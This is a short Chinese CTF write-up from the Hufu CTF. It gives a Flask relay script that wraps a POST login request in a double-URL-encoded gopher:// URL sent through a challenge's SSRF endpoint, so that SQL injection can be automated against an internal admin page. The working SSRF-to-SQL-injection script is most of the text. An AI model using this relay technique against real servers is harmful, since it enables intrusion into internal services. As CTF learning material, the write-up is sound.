以本次虎符CTF为例,我们在进行常规SQL注入的时候,会遇到这几种情况
①常常会因为构造网络请求麻烦
②写tamper嫌麻烦

这时候我们的中转注入就来了,这次的虎符CTF比赛当中有一个Web题需要我们频繁构造gopher去实现POST或者GET请求,这时候如果我们想要实现更自由的SQL注入,便可使用,下面直接放上脚本,请自行理解,一点不难

from flask import Flask,request
from urllib.parse import quote
import requests


def urlencode(s):
    res=''
    for c in s:
        fuck=hex(ord(c)).split('0x')[1]
        if len(fuck)==1:
            fuck='0'+fuck
        res+="%"+fuck
    return res

fuckhtml='''POST /admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: {length}

username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")
tmpPayload= fuckhtml.split("\r\n")[-1]
tmplength = len(tmpPayload) - len('{username}')

url="http://eci-2zehhuwx9m3o88h32zup.cloudeci1.ichunqiu.com/ssrf.php?way=gopher%3A%2F%2F127.0.0.1:80%2F_"


app = Flask(__name__)


@app.route('/')
def hello_world():
    username=request.args.get('username')
    shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))
    cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'}
    page=requests.get(url+urlencode(urlencode(shit)),proxies={'http':'http://127.0.0.1:8081'},cookies=cookies).text
    return page

if __name__ == '__main__':
    app.run()

当然我们可以去掉proxies参数,我这里加上只是为了和burpsuite实现联动